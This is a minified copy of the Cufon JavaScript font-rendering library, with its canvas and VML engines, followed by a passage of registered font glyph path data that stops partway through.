var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode(""))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"92,-205v0,-18,-15,-32,-33,-32v-18,-1,-33,14,-32,32v0,18,14,33,32,33v18,0,33,-15,33,-33xm8,-204v0,-29,23,-54,51,-53v28,0,52,25,52,53v0,28,-24,51,-52,51v-27,0,-51,-22,-51,-51","w":118},{"d":"67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0","w":167,"k":{"y":6,"Y":6,"W":6,"V":6,"T":10,";":-7,":":-7,".":-11,",":-11}},{"d":"105,-101v5,-33,-27,-48,-44,-27v-4,6,-6,15,-6,27r50,0xm78,-176v53,0,71,43,69,103r-92,1v-7,39,40,55,49,20r41,0v-6,32,-30,56,-67,55v-45,0,-70,-40,-70,-89v0,-51,24,-90,70,-90xm128,-261r-53,65r-23,0r33,-65r43,0","w":154},{"d":"62,-174v20,0,29,13,37,28r0,-26r46,0r0,159v-2,67,-8,93,-68,93v-40,0,-65,-21,-63,-63r40,0v0,16,7,25,23,25v31,0,20,-38,22,-65v-42,56,-88,6,-88,-63v0,-47,12,-88,51,-88xm79,-39v29,-3,30,-96,-1,-97v-30,3,-27,95,1,97","w":163,"k":{".":6,",":6}},{"d":"19,0r0,-272r47,0r0,272r-47,0","w":84},{"d":"52,-118r-30,0r6,-37r30,0v8,-51,8,-118,75,-103r15,3r-6,40v-36,-13,-29,35,-35,60r31,0r-5,37r-32,0v-12,57,-13,141,-38,182v-12,20,-40,19,-63,11r6,-40v18,6,22,-3,25,-22"},{"d":"79,-38v14,0,17,-8,17,-24r0,-110r47,0v-5,76,23,184,-63,175v-87,9,-58,-98,-64,-175r47,0r0,110v0,17,1,24,16,24xm51,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm109,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21"},{"d":"13,-261r22,0r25,38r26,-38r22,0r-30,65r-35,0xm112,-53v5,54,-73,73,-107,38r19,-35v11,9,37,22,40,-1v-8,-26,-55,-32,-55,-72v0,-53,67,-66,103,-38r-20,34v-10,-9,-33,-18,-37,0v11,25,62,34,57,74","w":120},{"d":"63,-128v-4,56,28,108,66,69v6,-10,10,-24,10,-41r-46,0r0,-45r95,0v6,77,-21,148,-88,148v-62,0,-88,-59,-88,-131v0,-94,67,-167,140,-115v14,10,24,28,30,49r-46,21v-3,-22,-13,-36,-34,-38v-36,4,-36,37,-39,83","w":200,"k":{"Y":6,"T":6,";":-7,":":-7,".":10,"-":-8,",":10}},{"d":"19,0r0,-172r47,0r0,172r-47,0xm93,-261r-53,65r-23,0r33,-65r43,0","w":84},{"d":"81,4v-78,7,-92,-132,-26,-146r0,-34r49,0r0,60v-28,2,-37,14,-38,43v1,16,3,30,17,30v12,0,17,-13,16,-28r48,0v2,48,-21,71,-66,75xm80,-198v-17,0,-31,-14,-31,-31v0,-18,14,-31,31,-31v17,0,31,14,31,31v0,17,-14,31,-31,31","w":155},{"d":"9,-86v0,-62,42,-108,99,-83r0,46v-22,-21,-56,1,-51,35v-5,35,29,58,51,36r0,45v-50,31,-99,-16,-99,-79xm108,49v2,42,-50,40,-80,28r0,-23v13,4,24,8,37,8v9,0,15,-3,15,-13v0,-12,-13,-12,-26,-12r0,-37r17,0v1,5,-3,15,2,16v23,-1,34,11,35,33","w":114},{"d":"9,-86v0,-62,42,-108,99,-83r0,46v-22,-21,-56,1,-51,35v-5,35,29,58,51,36r0,45v-50,31,-99,-16,-99,-79xm125,-261r-53,65r-23,0r33,-65r43,0","w":114},{"d":"54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-90xm51,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm109,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":159},{"d":"76,-24r-26,15r-44,-79r44,-75r26,15r-35,60xm141,-24r-26,15r-45,-79r45,-75r26,15r-35,60","w":146,"k":{"\u00c6":-27,"Y":13,"W":6,"V":13,"T":20,"J":-7}},{"d":"111,-49r-23,7r0,36r-23,0r0,-36v-38,-4,-56,-43,-55,-89v1,-44,19,-77,55,-85r0,-34r23,0r0,34v10,0,16,2,23,6r0,44v-24,-17,-59,-2,-53,34v-4,38,25,56,53,39r0,44"},{"d":"160,-156v0,-27,-23,-51,-50,-51v-28,0,-52,23,-52,51v0,28,24,51,52,51v27,0,50,-23,50,-51xm49,-112v-19,-19,-19,-68,0,-87r-36,-36r17,-16r35,35v22,-18,67,-18,88,0r36,-35r16,16r-35,36v18,21,18,66,0,87r35,36r-16,16r-36,-36v-21,20,-67,19,-88,0r-35,36r-17,-16","w":218},{"d":"79,-39v28,-2,30,-95,-1,-96v-30,2,-28,94,1,96xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,241r-46,0r0,-94v-8,17,-18,29,-39,29v-38,0,-49,-44,-49,-89v-1,-49,12,-89,51,-89","w":163},{"d":"62,-123v0,45,6,79,47,78r-27,-30r28,-23r24,26v11,-44,16,-139,-32,-139v-36,0,-40,41,-40,88xm102,-260v97,-4,111,161,66,226r26,29r-28,24r-24,-27v-76,37,-130,-34,-130,-124v0,-70,27,-125,90,-128","w":203,"k":{";":-7,":":-7,".":11,"-":-7,",":11}},{"d":"140,-261r-53,65r-23,0r33,-65r43,0","w":180},{"d":"67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0xm135,-345r-53,65r-23,0r33,-65r43,0","w":167},{"d":"99,-134v35,-2,75,23,103,23v28,-1,46,-12,67,-27r0,33v-20,13,-40,23,-67,24v-34,1,-78,-25,-103,-23v-29,2,-46,12,-68,28r0,-33v20,-13,40,-24,68,-25","w":299},{"d":"67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0xm56,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm114,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":167},{"d":"38,-280r30,-65r35,0r29,65r-21,0r-26,-38r-26,38r-21,0xm67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0","w":167},{"d":"84,-39v28,0,22,-65,16,-86v-3,-7,-8,-10,-15,-10v-31,1,-30,96,-1,96xm102,4v-19,0,-32,-14,-38,-29r0,94r-46,0r0,-341r46,0r0,124v8,-15,17,-26,37,-26v39,0,51,41,51,89v0,46,-11,87,-50,89","w":163},{"d":"10,-199v0,-73,87,-61,160,-61r0,17r-20,0r0,243r-23,0r0,-243r-29,0r0,243r-23,0r0,-138v-37,-1,-65,-23,-65,-61","w":180},{"d":"84,-39v28,0,22,-65,16,-86v-3,-7,-8,-10,-15,-10v-31,1,-30,96,-1,96xm102,4v-19,0,-32,-14,-38,-29r0,94r-46,0r0,-241r45,0r0,26v10,-16,17,-28,38,-28v39,0,51,41,51,89v0,46,-11,87,-50,89","w":163,"k":{"-":-7}},{"d":"67,-129v0,53,35,97,85,75r0,51v-79,26,-140,-42,-140,-123v0,-84,57,-155,140,-128r0,48v-51,-22,-85,22,-85,77xm148,49v2,42,-50,40,-80,28r0,-23v13,4,24,8,37,8v9,0,15,-3,15,-13v0,-12,-13,-12,-26,-12r0,-37r17,0v1,5,-3,15,2,16v23,-1,34,11,35,33","w":163},{"d":"45,-32r210,0r0,30r-210,0r0,-30xm135,-212r30,0r0,59r90,0r0,29r-90,0r0,58r-30,0r0,-58r-90,0r0,-29r90,0r0,-59","w":299},{"d":"49,-289v-11,1,-23,-12,-23,-23v0,-11,12,-23,23,-23v11,0,23,12,23,23v0,12,-12,23,-23,23xm22,0r0,-257r53,0r0,257r-53,0","w":97},{"d":"79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88xm39,-261r43,0r33,65r-23,0","w":163},{"d":"61,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm119,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":180},{"d":"76,-103v-33,12,-17,72,20,57v4,-1,8,-3,12,-6xm91,-214v-27,0,-17,38,-5,49v15,-7,31,-43,5,-49xm149,-199v0,31,-20,52,-41,67r32,52r26,-28r26,37r-30,26r29,45r-51,0r-11,-18v-40,45,-121,6,-117,-56v2,-32,18,-52,40,-68v-35,-39,-22,-110,41,-110v32,0,56,22,56,53","w":196},{"d":"103,-93v-76,-6,8,-151,-76,-135r0,-32v52,-1,76,7,76,62v0,48,-8,97,49,89r0,31v-55,-8,-51,40,-49,90v2,55,-24,62,-76,61r0,-31v82,18,1,-129,76,-135","w":180},{"d":"63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132xm73,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm131,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":203},{"d":"63,-246v18,2,44,20,48,-6r16,0v0,42,-32,48,-65,34v-8,0,-11,6,-13,14r-16,0v4,-22,10,-40,30,-42xm54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-